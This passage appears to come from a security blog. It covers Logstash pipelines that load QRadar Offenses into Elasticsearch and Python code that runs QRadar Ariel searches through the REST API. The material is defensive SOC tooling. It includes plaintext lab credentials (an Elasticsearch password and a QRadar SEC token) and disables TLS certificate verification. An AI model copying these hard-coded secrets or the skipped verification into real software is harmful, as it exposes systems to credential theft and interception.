                    }
                }
            }
        }
}
filter {
        if [description] =~ "Bad Username" {
            date {
                match => ["start_time", "UNIX_MS"]
                target => "start_time"
            }
            mutate {
                add_field => {
                    "username" => "%{[offense_source]}"
                }
                replace => {
                    "description" => "Bad Username Detected - %{offense_source}"
                }
            }
            prune {
                whitelist_names => ["^id$","^magnitude$","^start_time$","^username$","^description$","^categories$"]
            }
        }
        else {
           drop {}
        }
}
output {
        stdout {}
        elasticsearch {
            index => "bad-username-offenses"
            document_id => "%{[id]}"
            hosts => "https://127.0.0.1:9200"
            user => "elastic"
            password => "luKCzUWSLiL=Ah7rUanu"
            cacert => "/etc/elasticsearch/certs/http_ca.crt"
        }
}

Assuming the above configuration file is saved as qradar-offenses.conf, we can run it with Logstash using the command:

logstash -f /root/logstash-blog/qradar-offenses.conf

Note: Please ensure that you specify the full path to the .conf file. By default, Logstash will attempt to find the .conf file in /usr/share/logstash/.

Note: If the logstash command is not found in your PATH, try using /usr/share/logstash/bin/logstash instead.

The output from Logstash is seen below. It has been truncated, as listing every Offense would take too many lines.

{
             "id" => 16,
    "description" => "Bad Username Detected - pepsi",
       "username" => "pepsi",
     "start_time" => 2022-07-13T18:53:47.388Z,
     "categories" => [
        [0] "SSH Login Failed"
    ],
      "magnitude" => 4
}
{
             "id" => 15,
    "description" => "Bad Username Detected - paratha1",
       "username" => "paratha1",
     "start_time" => 2022-07-13T18:53:30.326Z,
     "categories" => [
        [0] "SSH Login Failed"
    ],
      "magnitude" => 4
}
{
             "id" => 14,
    "description" => "Bad Username Detected - paratha",
       "username" => "paratha",
     "start_time" => 2022-07-13T18:52:55.233Z,
     "categories" => [
        [0] "SSH Login Failed"
    ],
      "magnitude" => 4
}
.
.
.

Similarly, we can verify that the data was stored in Elasticsearch by making a request to the Search API using curl. The output is seen below; it has been truncated, as listing every Offense would take too many lines.

> curl --cacert /etc/elasticsearch/certs/http_ca.crt -u elastic:luKCzUWSLiL=Ah7rUanu https://localhost:9200/bad-username-offenses/_search

{
  "took": 1,
  "timed_out": false,
  "_shards": {
    "total": 1,
    "successful": 1,
    "skipped": 0,
    "failed": 0
  },
  "hits": {
    "total": {
      "value": 7,
      "relation": "eq"
    },
    "max_score": 1,
    "hits": [
      {
        "_index": "bad-username-offenses",
        "_id": "16",
        "_score": 1,
        "_source": {
          "id": 16,
          "description": "Bad Username Detected - pepsi",
          "username": "pepsi",
          "start_time": "2022-07-13T18:53:47.388Z",
          "categories": [
            "SSH Login Failed"
          ],
          "magnitude": 4
        }
      },
      {
        "_index": "bad-username-offenses",
        "_id": "15",
        "_score": 1,
        "_source": {
          "id": 15,
          "description": "Bad Username Detected - paratha1",
          "username": "paratha1",
          "start_time": "2022-07-13T18:53:30.326Z",
          "categories": [
            "SSH Login Failed"
          ],
          "magnitude": 4
        }
      },
      {
        "_index": "bad-username-offenses",
        "_id": "14",
        "_score": 1,
        "_source": {
          "id": 14,
          "description": "Bad Username Detected - paratha",
          "username": "paratha",
          "start_time": "2022-07-13T18:52:55.233Z",
          "categories": [
            "SSH Login Failed"
          ],
          "magnitude": 4
        }
      },
      .
      .
      .
    ]
  }
}

As seen in the above snippet, we have our Offenses stored in an Elasticsearch index. We can now perform queries, aggregations, and other operations on our data. Furthermore, like MongoDB, we can integrate Elasticsearch with Business Intelligence (BI) platforms to produce automated reports and dashboards. A quick way to start visualizing Elasticsearch data is with Kibana.
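As a minimal sketch of such an aggregation, the Python below asks Elasticsearch for the number of Offenses per username using a terms aggregation. It assumes the index was created with Elasticsearch's default dynamic mapping, which adds a username.keyword sub-field to string fields; the aggregation name offenses_per_user and all helper names are hypothetical. The network call reuses the URL, CA certificate, and elastic user from the curl command above.

```python
def username_agg_body(top_n: int = 10) -> dict:
    """Search API body that returns no hits, only Offense counts per username."""
    return {
        "size": 0,  # skip the matching documents themselves
        "aggs": {
            "offenses_per_user": {  # hypothetical aggregation name
                # Assumes the default dynamic mapping's 'username.keyword' sub-field
                "terms": {"field": "username.keyword", "size": top_n}
            }
        },
    }


def bucket_counts(response: dict) -> dict:
    """Map each username bucket in a Search API response to its document count."""
    buckets = response["aggregations"]["offenses_per_user"]["buckets"]
    return {b["key"]: b["doc_count"] for b in buckets}


def fetch_username_counts(password: str) -> dict:
    """POST the aggregation to the same endpoint queried with curl above."""
    import requests  # imported here so the helpers above need only the stdlib

    resp = requests.post(
        "https://localhost:9200/bad-username-offenses/_search",
        json=username_agg_body(),
        auth=("elastic", password),
        verify="/etc/elasticsearch/certs/http_ca.crt",
    )
    resp.raise_for_status()
    return bucket_counts(resp.json())
```

Keeping the request body and the response parsing in separate functions lets you check both without a running cluster.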

Conclusion

In this tutorial, we learnt how to develop ETL pipelines on Logstash to programmatically fetch raw data from QRadar REST APIs, apply processing, and output the results to various formats and destinations. To summarize:

We started by introducing ETL (extract, transform and load) and explained how it enables SOC teams to ingest data from different sources, fuse and correlate data, and produce actionable reports and dashboards. We also introduced Logstash, an open-source data pipeline that can help us achieve our ETL goals.

Then, we began our journey to understand Logstash pipeline configurations with three examples.

In the first example, we fetched all the Rules deployed on QRadar and routed them to the standard output (STDOUT). Here, in the input stage, we leveraged the Http_poller input plugin to make the REST API request to QRadar and fetch raw JSON data. In the filter stage, we leveraged the Prune filter plugin to whitelist only the required fields, and in the output stage, we leveraged the Stdout output plugin to print the processed event to STDOUT.

In the second example, we fetched all the Log Sources onboarded on QRadar and persisted them to a MongoDB database collection. Here, in the input stage, similar to the previous example, we leveraged the Http_poller input plugin to make the REST API request to QRadar and fetch raw JSON data. In the filter stage, we leveraged the Mutate filter plugin to add a new field (_id) to the output event. We also leveraged the Prune filter plugin to whitelist only the required fields. In the output stage, we leveraged the Mongodb output plugin to store the events as BSON documents within a MongoDB database collection. We connected to the MongoDB server using mongosh and ran a few queries to confirm that the data was properly persisted.

In the third example, we fetched all the Offenses created on QRadar and persisted them to an Elasticsearch index. Here, in the input stage, similar to the previous examples, we leveraged the Http_poller input plugin to make the REST API request to QRadar and fetch raw JSON data. In the filter stage, we leveraged conditional statements to limit the Offenses to a subset of SSH login violations. Then, we leveraged the Date filter plugin to parse the start_time timestamp and convert it from Unix time to ISO 8601. We also leveraged the Mutate filter plugin to capture the username associated with each Offense in a separate field, and to modify the description field to include the username. We also leveraged the Prune filter plugin to whitelist only the required fields. In the output stage, we leveraged the Elasticsearch output plugin to store the events as documents within an Elasticsearch index. To verify that the data was properly persisted, we sent a GET request to the Elasticsearch Search API using curl to fetch all the Offenses.

Using the examples discussed in this tutorial, you can easily write new Logstash configurations and leverage the many available plugins to perform all kinds of ETL operations. In the SOC, you can modify these examples to fetch data from your other systems (such as SIEM, SOAR, EDR, and Vulnerability Management, among many others) and integrate your destinations with Business Intelligence (BI) tools and platforms to automate SOC reporting.

I hope you enjoyed reading this tutorial. Please reach out via email if you have any questions or comments.

Qradar Aql Search Rest Api

2022-01-09T00:00:00+00:00

Introduction

In this tutorial, we will learn how to leverage the QRadar Ariel Search REST API endpoints to run Ariel searches and fetch their results programmatically using Python.

Note: This tutorial assumes you have admin access to a live QRadar deployment. For the purpose of this tutorial, I am using QRadar Community Edition. Please follow my step-by-step guide - How to install IBM QRadar CE V7.3.3 on VirtualBox to get a basic QRadar deployment up and running in your lab environment.

Note: This tutorial also assumes you have some experience with QRadar REST APIs and Python scripting. Please follow my step-by-step guide - QRadar REST APIs with Python to set up your Python environment with pip and Jupyter Notebook, generate a QRadar API Token, and write simple Python scripts that demonstrate how to make REST API requests to QRadar.

Pre-requisites

QRadar with admin access

I am using QRadar CE V7.3.3 as described above.
QRadar API Token

On QRadar, the API Token is also known as a SEC Token and must be generated by the admin on the QRadar Console. Please refer here for more information.
Python 3.x.x

I am using Python 3.9.7 on my MacBook Pro with macOS Big Sur.

The code written in this tutorial might cause issues with Python 2. Please refer to Python.org to download the latest release of Python 3 for your OS.
pip (Python Package Installer)

pip is a useful utility to install Python packages. I am using pip 21.2.4. If your Python environment does not have pip installed by default, please refer to the pip Installation documentation.
Install the following Python packages using pip:

requests

pip install requests
pandas

pip install pandas
jupyter

pip install jupyter

Searching in QRadar

Searching in QRadar is a basic but essential functionality. For instance, when a new Offense is created, you will ultimately navigate to the Log Activity tab to investigate the associated Events, as seen in the screenshot below. Although the filters are applied automatically, QRadar is fundamentally executing an Ariel search in the background.

SOC Analysts also leverage the search functionality to proactively query the SIEM for Indicators of Compromise (IoCs), adversary Tactics, Techniques, and Procedures (TTPs), and other malicious behaviors to determine whether cyber threats are present. This is known as Threat Hunting.

SIEM Administrators also rely upon the search functionality to ensure that the system is running as expected. Common use-cases include examining Events to ensure that necessary fields are correctly parsed, and calculating the Events per Second (EPS) consumption of onboarded Log Sources.

QRadar Ariel Search

In this section, we will start by dissecting the high-level steps involved in running a new QRadar Ariel Search programmatically. Then, we will move on to the various QRadar Ariel Search REST API endpoints and their specifications, including parameters and responses. Finally, we will write Python code to implement the concepts and retrieve the result of a QRadar Saved Search titled Top Log Sources.

Workflow

Let us understand the high-level steps involved in running a new QRadar Ariel Search programmatically. They are:

1. Create a new QRadar Ariel Search using a Saved Search ID or AQL Query

We start by creating a new REST API request. You can either provide a raw AQL Query or a Saved Search ID within the REST API request for QRadar to execute.

According to IBM QRadar documentation:

The Ariel Query Language (AQL) is a structured query language that you use to communicate with the Ariel databases. Use AQL to query and manipulate event and flow data from the Ariel database.

According to IBM QRadar documentation:

You can save configured search criteria so that you can reuse the criteria and use the Saved Search criteria in other components, such as reports. Saved Search criteria does not expire.

Using the Saved Search ID is preferred when you want to perform the same Ariel Search without modifying its associated AQL Query.

For example: Top Log Sources in the last 6 Hours.

There is no need for a SIEM Administrator to modify the AQL Query associated with the above Saved Search if they intend to run it every 6 hours. In this case, using the Saved Search ID corresponding to that AQL Query is the best approach.

Using the raw AQL Query is preferred when you cannot save the AQL Query as a Saved Search. This occurs when the AQL Query is dynamically created.

For example: Login Failures for User {XYZ}.

Assume we have a list of usernames as follows:

tom
anthony
raj

Our goal is to search QRadar for “Login Failure” Events for each user. The AQL Query will likely need to be modified with each username as follows:

... WHERE username ILIKE '%tom%'
... WHERE username ILIKE '%anthony%'
... WHERE username ILIKE '%raj%'

It does not make sense to save each AQL Query as a separate Saved Search. Instead, it is easier to dynamically construct the AQL Query at runtime with the username.
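A minimal sketch of building one AQL Query per username at runtime is shown below. The template is hypothetical: its SELECT list and LAST 24 HOURS window are placeholders, and a real query would also need the filter that restricts results to Login Failure Events. As a simple safety assumption, the helper refuses usernames containing a single quote rather than trying to escape them inside the AQL string literal.

```python
# Hypothetical template; add your Login Failure filter to the WHERE clause
AQL_TEMPLATE = (
    "SELECT username, COUNT(*) AS 'Count' FROM events "
    "WHERE username ILIKE '%{user}%' GROUP BY username LAST 24 HOURS"
)


def build_queries(usernames):
    """Return a dict mapping each username to its AQL Query string."""
    queries = {}
    for user in usernames:
        # A quote would terminate the AQL string literal early, so reject it
        if "'" in user:
            raise ValueError(f"refusing to embed a quote in AQL: {user!r}")
        queries[user] = AQL_TEMPLATE.format(user=user)
    return queries


for user, aql in build_queries(["tom", "anthony", "raj"]).items():
    print(user, "->", aql)
```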

2. A Search ID for the new QRadar Ariel Search is returned

Once the above request is created with the Saved Search ID or AQL Query, a response is returned with a unique Search ID.

3. Use Search ID to check status of QRadar Ariel Search

We utilize the returned Search ID to create a new REST API request to retrieve the status of the QRadar Ariel Search.

The goal is to determine if the QRadar Ariel Search has completed execution.

Multiple factors affect the performance of a QRadar Ariel Search; some searches take longer because of the complexity of the AQL Query or the length of the time range it covers. In practice, the recommended approach is to poll the REST API for the status of the QRadar Ariel Search at defined intervals. You can set the interval to 30 seconds, 1 minute, 5 minutes, 10 minutes, or longer based on previous knowledge and experience.

Note: Run the AQL Query or Saved Search manually at least once on the QRadar Console to approximately determine its execution time.

4. Use Search ID to retrieve result once QRadar Ariel Search is Completed

Once it is determined that the QRadar Ariel Search is successfully completed, we can create a new REST API request with the Search ID to retrieve the result.

The below diagram summarizes the workflow and its steps:

QRadar Ariel Search REST API Endpoints

Let us understand the various QRadar Ariel Search REST API endpoints and their specifications, which will allow us to complete all the steps in the above workflow. They are:

1. Find QRadar Ariel Saved Searches

It was mentioned above that we can create a new QRadar Ariel Search using a Saved Search ID or an AQL Query. If you want to proceed with Saved Search ID, you will need to first query QRadar and capture the correct Saved Search ID for the desired search/AQL Query.

The /ariel/saved_searches REST API endpoint can be used to retrieve a list of existing Saved Searches on QRadar. As seen in the screenshot below, a GET request to /ariel/saved_searches returns many useful fields including the name of the Saved Search, its ID, and its corresponding AQL Query.

Below is a sample JSON snippet displaying the name, id, and aql fields for a Saved Search titled Top Log Sources.

{
  "name": "Top Log Sources",
  "id": 2721,
  "aql": "SELECT logsourcename(logSourceId) AS 'Log Source', UniqueCount(\"sourceIP\") AS 'Source IP (Unique Count)', UniqueCount(\"destinationIP\") AS 'Destination IP (Unique Count)', UniqueCount(\"destinationPort\") AS 'Destination Port (Unique Count)', UniqueCount(qid) AS 'Event Name (Unique Count)', UniqueCount(category) AS 'Low Level Category (Unique Count)', UniqueCount(\"protocolId\") AS 'Protocol (Unique Count)', UniqueCount(\"userName\") AS 'Username (Unique Count)', MAX(\"magnitude\") AS 'Magnitude (Maximum)', SUM(\"eventCount\") AS 'Event Count (Sum)', COUNT(*) AS 'Count' from events GROUP BY logSourceId order by \"Event Count (Sum)\" desc last 6 hours"
}

Note that a GET request to /ariel/saved_searches returns an array of JSON objects, one per Saved Search. To narrow the response, we can use a filter within the GET request. As seen in the screenshot below, the REST API endpoint has an optional Query parameter called filter, which can be used to limit the response to a specific Saved Search or a subset of Saved Searches. Similarly, the optional fields Query parameter can be used to specify which fields should be returned in the response.
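To see how the filter and fields Query parameters travel in the request URL, the sketch below encodes them with the standard library's urlencode. The requests library encodes a params dictionary in a similar way, so this is mainly useful for checking quoting; the fields value id,name,aql is an illustrative choice.

```python
from urllib.parse import urlencode

BASE_URL = "https://192.168.56.144/api/ariel/saved_searches"

saved_search_params = {
    "filter": 'name="Top Log Sources"',  # double quotes around the name are required
    "fields": "id,name,aql",             # return only these fields
}

# '=' becomes %3D, '"' becomes %22, spaces become '+', commas become %2C
encoded_url = f"{BASE_URL}?{urlencode(saved_search_params)}"
print(encoded_url)
```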

2. Create QRadar Ariel Search

To create a new QRadar Ariel Search, make a POST request to the /ariel/searches REST API endpoint. As seen in the screenshot below, there are 2 optional Query parameters, query_expression and saved_search_id, which correspond to the AQL Query and the Saved Search ID respectively. Provide a value for the one that matches your chosen approach.

The request will return a JSON response containing a unique Search ID. Below is a sample JSON snippet displaying the search_id field.

{
  "search_id": "fdd8c0be-c88b-43fe-a3fd-6f88abfb9046"
}
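Because a new search is created from either an AQL Query or a Saved Search ID, a small helper can build the Query parameters and reject ambiguous input. The helper is hypothetical and not part of any QRadar library, and requiring exactly one of the two parameters is this sketch's own rule, mirroring the two approaches described above.

```python
def create_search_params(query_expression=None, saved_search_id=None):
    """Build Query parameters for POST /ariel/searches (hypothetical helper)."""
    # Exactly one of the two must be given: both None or both set is an error
    if (query_expression is None) == (saved_search_id is None):
        raise ValueError("provide exactly one of query_expression or saved_search_id")
    if query_expression is not None:
        return {"query_expression": query_expression}
    return {"saved_search_id": saved_search_id}


print(create_search_params(saved_search_id=2721))
# {'saved_search_id': 2721}
```

The returned dictionary can be passed as the params argument of the do_request function defined later in this tutorial.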

3. Check Status of QRadar Ariel Search

Once a new QRadar Ariel Search is created, its unique Search ID can be used to check the completion status. To retrieve the status of a created search, make a GET request to /ariel/searches/{search_id} by replacing {search_id} with the actual Search ID associated with the search. As seen in the screenshot below, search_id is a required Path parameter to be sent along with the request.

If we replace search_id with the Search ID from the previous snippet, the request URL would look like:

/ariel/searches/fdd8c0be-c88b-43fe-a3fd-6f88abfb9046

The request will return a JSON response containing many fields pertaining to the status of the search. Below is a sample JSON snippet of the response displaying the progress, query_execution_time, and status fields.

{
  "progress": 46,
  "query_execution_time": 1480,
  "status": "COMPLETED"
}

4. Get Result of QRadar Ariel Search

Once the QRadar Ariel Search has completed, make a GET request to /ariel/searches/{search_id}/results, replacing {search_id} with the actual Search ID associated with the search, to retrieve its result. As seen in the screenshot below, search_id is a required Path parameter to be sent along with the request. The result can also be retrieved in various formats: the Accept request header indicates the desired format. The formats are RFC compliant and can be JSON, CSV, XML, or tabular text.
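As a sketch of requesting CSV instead of JSON, the snippet below sets the Accept header and parses CSV text with the standard library. The media type application/csv is an assumption here; check the interactive API documentation on your QRadar Console for the exact values your version supports. The sample body is illustrative only, built from two columns of the JSON sample below.

```python
import csv
import io

# Assumed media type for CSV results; verify it against your Console's API docs
csv_headers = {"SEC": "<your SEC token>", "Accept": "application/csv"}


def parse_csv_results(text: str) -> list:
    """Turn CSV text from the results endpoint into a list of dicts keyed by column."""
    return list(csv.DictReader(io.StringIO(text)))


# Illustrative body using two columns from the JSON sample
sample = "Log Source,Event Count (Sum)\nHealth Metrics-2 :: localhost,30040.0\n"
rows = parse_csv_results(sample)
print(rows[0]["Log Source"], rows[0]["Event Count (Sum)"])
```

Note that csv.DictReader returns every value as a string, so numeric columns need converting before aggregation.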

Below is a sample JSON snippet of the response displaying the fields specified in the AQL Query associated with the QRadar Ariel Search.

"events": [
  {
    "Log Source": "Health Metrics-2 :: localhost",
    "Source IP (Unique Count)": 1.0,
    "Destination IP (Unique Count)": 1.0,
    "Destination Port (Unique Count)": 1.0,
    "Event Name (Unique Count)": 1.0,
    "Low Level Category (Unique Count)": 1.0,
    "Protocol (Unique Count)": 1.0,
    "Username (Unique Count)": 0.0,
    "Magnitude (Maximum)": 4.0,
    "Event Count (Sum)": 30040.0,
    "Count": 30040.0
  },
  .
  .
  .
]

Note that the result rows are returned as an array of JSON objects. In the snippet above, events is that array, and each object in it pertains to a specific Log Source.

The fields returned in the response are solely dependent on the AQL Query associated with the QRadar Ariel Search. We can see that all the fields returned in the JSON response above are specified in the SELECT statement of the AQL Query below.

SELECT   logsourcename(logSourceId)     AS 'Log Source',
         UniqueCount("sourceIP")        AS 'Source IP (Unique Count)',
         UniqueCount("destinationIP")   AS 'Destination IP (Unique Count)',
         UniqueCount("destinationPort") AS 'Destination Port (Unique Count)',
         UniqueCount(qid)               AS 'Event Name (Unique Count)',
         UniqueCount(category)          AS 'Low Level Category (Unique Count)',
         UniqueCount("protocolId")      AS 'Protocol (Unique Count)',
         UniqueCount("userName")        AS 'Username (Unique Count)',
         MAX("magnitude")               AS 'Magnitude (Maximum)',
         SUM("eventCount")              AS 'Event Count (Sum)',
         COUNT(*)                       AS 'Count'
FROM     events
GROUP BY logSourceId
ORDER BY "Event Count (Sum)" DESC 
LAST 6 HOURS

Python Code

We will use the programming concept of recursion to implement the QRadar Ariel Search workflow in Python.

According to GeeksforGeeks:

The process in which a function calls itself directly or indirectly is called recursion and the corresponding function is called as recursive function. Using recursive algorithm, certain problems can be solved quite easily. Examples of such problems are Towers of Hanoi (TOH), Inorder/Preorder/Postorder Tree Traversals, DFS of Graph, etc.

We will start by importing the necessary Python packages as seen below.

import requests
import pandas
import time

The next step is to define a variable called SEC_TOKEN to hold the QRadar API Token as seen below. Please refer here on how to generate a QRadar API Token.

SEC_TOKEN = '4150d602-11ba-4d55-b3de-b6ebfe8b93ac'
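Hard-coding the token is convenient in a lab, but it then lives in the notebook and in every copy of it. A common alternative, sketched below, reads the token from an environment variable at runtime. The variable name QRADAR_SEC_TOKEN and the helper load_sec_token are hypothetical.

```python
import os


def load_sec_token(var_name: str = "QRADAR_SEC_TOKEN") -> str:
    """Read the QRadar API Token from an environment variable (hypothetical name)."""
    token = os.environ.get(var_name)
    if not token:
        # Fail early with a clear message instead of sending an empty SEC header
        raise RuntimeError(f"Set the {var_name} environment variable first")
    return token
```

With the variable exported in the shell that starts Jupyter, SEC_TOKEN = load_sec_token() replaces the hard-coded assignment.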

The next step is to define a variable called header to hold the HTTP headers for the API request, as seen below. We use the SEC_TOKEN variable defined above as the value of the SEC key.

header = {
    'SEC':SEC_TOKEN,
    'Content-Type':'application/json',
    'accept':'application/json'
}

After the variables have been defined, we will define 2 functions as follows:

1. `do_request` function

This function is responsible for making the actual REST API request using the requests Python module as seen below. It takes the HTTP method, request URL, and request parameters as function arguments and returns the JSON response. It is generic by design to promote re-usability and reduce the lines of code.

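Note: params in this function is an example of a default parameter, which lets us specify a default value in case no argument is passed. By default, params takes the value {}, an empty dictionary, unless a value is explicitly passed as an argument. Because a mutable default is created once and shared across calls, this is only safe because do_request never modifies params.

def do_request(method, url, params={}):
    # verify=False skips TLS certificate verification; only acceptable in a lab
    # where the QRadar Console uses a self-signed certificate
    r = requests.request(method=method, url=url, params=params, headers=header, verify=False)
    # Parse and return the JSON body of the response
    return r.json()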

2. `check_status` function

This function is the recursive function responsible for checking the status of the QRadar Ariel Search at a defined interval of 3 seconds as seen below. The function will return the JSON response once the search is completed.

The base case in the function is when the variable search_status is set to COMPLETED. In the base case, the do_request function is called to retrieve the result of the QRadar Ariel Search.

When search_status is set to a value other than COMPLETED, the recursive case is triggered and check_status calls itself. First, time.sleep(3) suspends execution for 3 seconds. Then, the do_request function is called to fetch the status of the QRadar Ariel Search. The status of the search, accessed via resp_json['status'], is passed as an argument to the recursive call.

The recursive calls are repeated until the base case is satisfied, i.e., when search_status="COMPLETED", which stops the recursion and retrieves the result of the search. We must ensure that the base case is eventually reached; otherwise, the function keeps calling itself until Python raises a RecursionError once the maximum recursion depth is exceeded.

def check_status(search_status, search_id):
    if search_status=="COMPLETED":
        # Base case: the search has finished, so fetch and return its results
        print("Search Completed")
        method = "GET"
        url = 'https://192.168.56.144/api/ariel/searches/%s/results' % search_id
        return do_request(method, url)
    else:
        # Recursive case: wait, fetch the latest status, and call this function again
        print("Waiting for 3 seconds...")
        time.sleep(3)
        method = "GET"
        url = 'https://192.168.56.144/api/ariel/searches/%s' % search_id
        resp_json = do_request(method, url)
        return check_status(resp_json['status'], search_id)

According to IBM QRadar documentation:

The search status value can be one of: WAIT, EXECUTE, SORTING, COMPLETED, CANCELED, or ERROR.

Note that, for the sake of simplicity, our code only treats COMPLETED as a base case. A more robust implementation would add base cases for the CANCELED and ERROR statuses, so that a canceled or failed search does not keep the function polling.

According to MIT:

A recursive implementation may have more than one base case, or more than one recursive step. For example, the Fibonacci function has two base cases, n=0 and n=1.
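As a sketch of that more robust version, the loop below replaces recursion with iteration, treats CANCELED and ERROR as terminal failures, and gives up after a maximum number of attempts. A loop also avoids Python's recursion limit (1000 frames by default, see sys.getrecursionlimit()), which the recursive check_status would reach after roughly 50 minutes of 3-second waits. The function name, its parameters, and the use of logging instead of print are assumptions; fetch_status and fetch_results are passed in so the function can be tested without a QRadar Console.

```python
import logging
import time

logger = logging.getLogger("qradar.ariel")  # hypothetical logger name

TERMINAL_FAILURES = {"CANCELED", "ERROR"}


def wait_for_search(search_id, fetch_status, fetch_results,
                    interval=3.0, max_attempts=200):
    """Poll an Ariel search until it completes, then return its results.

    fetch_status(search_id)  -> dict with a 'status' key
    fetch_results(search_id) -> the results dict
    """
    for attempt in range(1, max_attempts + 1):
        status = fetch_status(search_id)["status"]
        if status == "COMPLETED":
            logger.info("Search %s completed", search_id)
            return fetch_results(search_id)
        if status in TERMINAL_FAILURES:
            raise RuntimeError(f"Search {search_id} ended with status {status}")
        logger.info("Search %s is %s (attempt %d), waiting %.0f s",
                    search_id, status, attempt, interval)
        time.sleep(interval)
    raise TimeoutError(f"Search {search_id} not finished after {max_attempts} attempts")
```

With the do_request function above, you could pass fetch_status=lambda sid: do_request("GET", 'https://192.168.56.144/api/ariel/searches/%s' % sid) and the matching .../results URL for fetch_results. Call logging.basicConfig(level=logging.INFO) to see the progress messages. Unlike check_status, this version checks the status before sleeping.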

The next step is to utilize the above 2 defined functions to perform a new QRadar Ariel Search and display its result. Let us attempt to perform the Saved Search titled Top Log Sources.

To capture the correct Saved Search ID associated with the Top Log Sources Saved Search, we will define the request URL and request parameters as seen below.

url = 'https://192.168.56.144/api/ariel/saved_searches'
params = {'filter':'name="Top Log Sources"'}
type(params)
# dict

params is a dictionary with a single key called filter. The associated value is name="Top Log Sources". It is important to note the double quotes encapsulating the Saved Search name.

The next step is to make a GET request using our previously defined function do_request as seen below. The result is stored in a variable called res_json.

method = "GET"
res_json = do_request(method, url, params)
res_json
'''
[{'owner': 'admin',
  'is_dashboard': True,
  'description': '',
  'creation_date': 1245191315681,
  'uid': 'SYSTEM-13',
  'database': 'EVENTS',
  'is_default': False,
  'is_quick_search': True,
  'name': 'Top Log Sources',
  'modified_date': 1622547778276,
  'id': 2721,
  'is_aggregate': True,
  'aql': 'SELECT logsourcename(logSourceId) AS \'Log Source\', UniqueCount("sourceIP") AS \'Source IP (Unique Count)\', UniqueCount("destinationIP") AS \'Destination IP (Unique Count)\', UniqueCount("destinationPort") AS \'Destination Port (Unique Count)\', UniqueCount(qid) AS \'Event Name (Unique Count)\', UniqueCount(category) AS \'Low Level Category (Unique Count)\', UniqueCount("protocolId") AS \'Protocol (Unique Count)\', UniqueCount("userName") AS \'Username (Unique Count)\', MAX("magnitude") AS \'Magnitude (Maximum)\', SUM("eventCount") AS \'Event Count (Sum)\', COUNT(*) AS \'Count\' from events GROUP BY logSourceId order by "Event Count (Sum)" desc last 6 hours',
  'is_shared': True}]
'''
type(res_json)
# list
len(res_json)
# 1

It is to be noted that res_json is of type list with a length of 1. We must remember this while attempting to parse the values.

Our goal is to capture the Saved Search ID using its key - id. We will define a variable called SAVED_SEARCH_ID to hold the Saved Search ID as seen below.

SAVED_SEARCH_ID = res_json[0]['id']
SAVED_SEARCH_ID
# 2721
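Indexing res_json[0] raises an IndexError if the filter matches nothing. A slightly more defensive sketch (the helper name is hypothetical) checks that exactly one Saved Search with the requested name came back before reading its id:

```python
def saved_search_id_from(res_json, name):
    """Return the id of the single Saved Search called `name` in res_json."""
    matches = [s for s in res_json if s.get("name") == name]
    if len(matches) != 1:
        raise LookupError(
            f"expected exactly one Saved Search named {name!r}, found {len(matches)}"
        )
    return matches[0]["id"]
```

For the response above, saved_search_id_from(res_json, "Top Log Sources") returns the same value as res_json[0]['id'].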

Now that we have the Saved Search ID (2721), we can create the QRadar Ariel Search by defining the request URL and request parameters as seen below.

method = "POST"
url = 'https://192.168.56.144/api/ariel/searches'
params = {'saved_search_id':SAVED_SEARCH_ID}
params
# {'saved_search_id': 2721}

The next step is to make a POST request using our previously defined function do_request as seen below. The result is stored in a variable called res_json.

res_json = do_request(method, url, params)
res_json
'''
{'cursor_id': '789355dd-2bb9-454a-9d05-26ba4d373d48',
 'status': 'WAIT',
 'compressed_data_file_count': 0,
 'compressed_data_total_size': 0,
 'data_file_count': 0,
 'data_total_size': 0,
 'index_file_count': 0,
 'index_total_size': 0,
 'processed_record_count': 0,
 'desired_retention_time_msec': 86400000,
 'progress': 0,
 'progress_details': [],
 'query_execution_time': 0,
 'query_string': 'SELECT logsourcename(logSourceId) AS \'Log Source\', UniqueCount("sourceIP") AS \'Source IP (Unique Count)\', UniqueCount("destinationIP") AS \'Destination IP (Unique Count)\', UniqueCount("destinationPort") AS \'Destination Port (Unique Count)\', UniqueCount(qid) AS \'Event Name (Unique Count)\', UniqueCount(category) AS \'Low Level Category (Unique Count)\', UniqueCount("protocolId") AS \'Protocol (Unique Count)\', UniqueCount("userName") AS \'Username (Unique Count)\', MAX("magnitude") AS \'Magnitude (Maximum)\', SUM("eventCount") AS \'Event Count (Sum)\', COUNT(*) AS \'Count\' from events GROUP BY logSourceId order by "Event Count (Sum)" desc last 6 hours',
 'record_count': 0,
 'size_on_disk': 0,
 'save_results': False,
 'completed': False,
 'subsearch_ids': [],
 'snapshot': None,
 'search_id': '789355dd-2bb9-454a-9d05-26ba4d373d48'}
'''

Our goal is to capture the Search ID using its key - search_id. We will define a variable called SEARCH_ID to hold the Search ID as seen below.

SEARCH_ID = res_json['search_id']
SEARCH_ID
# '789355dd-2bb9-454a-9d05-26ba4d373d48'

The next step is to invoke the check_status recursive function with the Search ID as seen below. The return value will be stored into a variable called resp.

resp = check_status("WAIT", SEARCH_ID)
'''
Waiting for 3 seconds...
Search Completed
'''
resp
'''
{'events': [{'Log Source': 'Health Metrics-2 :: localhost',
   'Source IP (Unique Count)': 1.0,
   'Destination IP (Unique Count)': 1.0,
   'Destination Port (Unique Count)': 1.0,
   'Event Name (Unique Count)': 1.0,
   'Low Level Category (Unique Count)': 1.0,
   'Protocol (Unique Count)': 1.0,
   'Username (Unique Count)': 0.0,
   'Magnitude (Maximum)': 5.0,
   'Event Count (Sum)': 113760.0,
   'Count': 113760.0},
  {'Log Source': 'System Notification-2 :: qradar',
   'Source IP (Unique Count)': 2.0,
   'Destination IP (Unique Count)': 1.0,
   'Destination Port (Unique Count)': 1.0,
   'Event Name (Unique Count)': 4.0,
   'Low Level Category (Unique Count)': 3.0,
   'Protocol (Unique Count)': 1.0,
   'Username (Unique Count)': 0.0,
   'Magnitude (Maximum)': 7.0,
   'Event Count (Sum)': 23292.0,
   'Count': 23292.0},
  {'Log Source': 'SIM Audit-2 :: qradar',
   'Source IP (Unique Count)': 3.0,
   'Destination IP (Unique Count)': 1.0,
   'Destination Port (Unique Count)': 1.0,
   'Event Name (Unique Count)': 8.0,
   'Low Level Category (Unique Count)': 2.0,
   'Protocol (Unique Count)': 1.0,
   'Username (Unique Count)': 5.0,
   'Magnitude (Maximum)': 8.0,
   'Event Count (Sum)': 168.0,
   'Count': 168.0},
  {'Log Source': 'Anomaly Detection Engine-2 :: qradar',
   'Source IP (Unique Count)': 1.0,
   'Destination IP (Unique Count)': 1.0,
   'Destination Port (Unique Count)': 1.0,
   'Event Name (Unique Count)': 1.0,
   'Low Level Category (Unique Count)': 1.0,
   'Protocol (Unique Count)': 1.0,
   'Username (Unique Count)': 0.0,
